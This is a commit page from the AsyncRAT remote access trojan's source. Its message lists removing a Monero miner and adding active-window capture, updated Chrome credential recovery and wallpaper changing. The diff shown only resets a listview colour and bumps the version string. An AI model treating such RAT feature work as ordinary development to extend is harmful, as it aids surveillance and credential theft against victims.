Update Packet.cs

removed xmr miner
added get active window title
updated chrome recovery
added feature change wallpaper
fixed listview when error occurred
This commit is contained in:
NYAN CAT 2020-03-26 06:48:09 +03:00
parent fd05091f11
commit 9f2955979e
2 changed files with 5 additions and 1 deletions

View File

@ -85,6 +85,10 @@ namespace Server.Handle_Packet
case "Error":
{
new HandleLogs().Addmsg($"Client {ip} error: {unpack_msgpack.ForcePathObject("Error").AsString}", Color.Red);
lock (Settings.LockListviewClients)
{
client.LV.ForeColor = Color.Empty;
}
break;
}
case "remoteDesktop":

View File

@ -19,7 +19,7 @@ namespace Server
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.5.6A";
public static readonly string Version = "AsyncRAT 0.5.6B";
public static object LockListviewClients = new object();
public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object();